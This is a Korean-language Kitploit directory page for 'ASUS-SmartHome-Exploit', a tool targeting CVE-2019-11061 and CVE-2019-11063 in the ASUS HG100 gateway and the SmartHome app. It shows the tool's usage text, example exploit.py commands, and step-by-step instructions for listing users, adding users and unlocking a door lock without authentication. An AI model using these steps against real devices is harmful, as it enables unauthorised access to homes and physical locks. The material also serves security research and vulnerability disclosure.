Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
ASUS-SmartHome-Exploit — CVE-2019-11061 및 CVE-2019-11063용 ASUS SmartHome Exploit | Kitploit
도구/GitHubGitHub/tim124058/asus-smarthome-exploit
IoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubtim124058/asus-smarthome-exploit

ASUS-SmartHome-Exploit

CVE-2019-11061 및 CVE-2019-11063용 ASUS SmartHome Exploit

저장소 보기
23747년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

ASUS-SmartHome-Exploit

CVE ID

CVE-2019-11061 : HG100의 취약한 접근 제어

영향을 받는 제품 : ASUS SmartHome Gateway HG100 펌웨어 버전 < 4.00.09

CVE-2019-11063 : SmartHome 앱의 취약한 접근 제어

영향을 받는 제품 : ASUS SmartHome Android 앱 버전 < 3.0.45_190701

설명

공격자가 HG100과 동일한 내부 네트워크에 있거나 동반 앱(android 또는 iPhone)이 설치된 모바일 기기와 동일한 네트워크에 있는 경우, 공격자는 해당 기기에 제어 요청을 보낼 수 있습니다.

그런 다음 공격자는 다음 작업을 수행하는 데 어떠한 인증도 필요하지 않습니다:
1. HG100에 추가된 모든 사용자 이름을 가져옵니다.
2. SmartHome Gateway(HG100) 아래의 모든 장치 정보를 가져옵니다.
3. SmartHome Gateway 아래의 제어 가능한 모든 장치(예: DoorLock, Meter Plug ...)를 제어합니다.
다음은 비밀번호(4~6자리, 기본값: "0000")가 필요합니다:
1. HG100에 사용자를 추가합니다.

익스플로잇 사용법:

익스플로잇 가능한 포트 스캔 :

root@kitploit:~
usage: exploit.py scan [-h] [-v] target_ip

scan exploitable port

positional arguments:
  target_ip   scan ip

optional arguments:
  -h, --help  show this help message and exit
  -v          show account email list

대상에 명령 보내기 :

root@kitploit:~
usage: exploit.py cmd [-h]
                      (-u | -l | -s device_id | -c device_id status | -a username)
                      [--user username] [--new-user username] [-v]
                      target

send command to target

positional arguments:
  target                <target-ip>:<port>

optional arguments:
  -h, --help            show this help message and exit
  -u, --list-user       list all user in device
  -l, --list-device     list all device status
  -s device_id, --device-status device_id
                        list device status
  -c device_id status, --device-control device_id status
                        control device status
  -a username, --add-user username
                        add a user to device
  --user username       assign user for cmd
  --new-user username   create a new user for cmd
  -v                    show account email list

참고: 2019/5/15 - ASUS가 SmartHome APP(3.0.42_190515) 및 Gateway(4.00.06) 업데이트를 출시했습니다. 그리고 HTTP 서비스에 SSL을 추가했습니다. 하지만 이 취약점은 여전히 존재합니다. 이 업데이트 이후에는 "cmd" 인수를 사용할 때 프로토콜을 지정해야 합니다.

예시:

root@kitploit:~
$ ./exploit.py cmd https://10.42.50.166:8083 -l

사용 예시:

1단계:

모바일 기기(android 또는 iPhone용 동반 앱이 설치된)의 익스플로잇 가능한 포트를 스캔합니다 :
앱 포트 참고: -v 옵션은 HG100에 추가된 사용자를 나열합니다.

또는

HG100의 익스플로잇 가능한 포트를 스캔합니다 :
HG100 포트

2단계:

HG100에 추가된 모든 사용자를 가져옵니다: 사용자 목록

또는 새 사용자를 추가합니다: 사용자 추가

참고: "cmd" 인수에 https://10.42.50.166:8083을 사용하세요.

예시:

root@kitploit:~
$ ./exploit.py cmd https://10.42.50.166:8083 -u

3단계:

SmartHome Gateway 아래의 모든 장치 정보를 가져옵니다: 장치 목록 참고: --user 옵션을 설정하지 않으면 HG100의 첫 번째 사용자가 자동으로 선택됩니다. (비밀번호가 필요 없기 때문입니다)

앱과 비교:


4단계:

DoorLock을 제어(잠금 해제)합니다. 장치 제어 참고: 1028 값은 -l 옵션(3단계)에서 얻은 값입니다.

결과:

도구 다운로드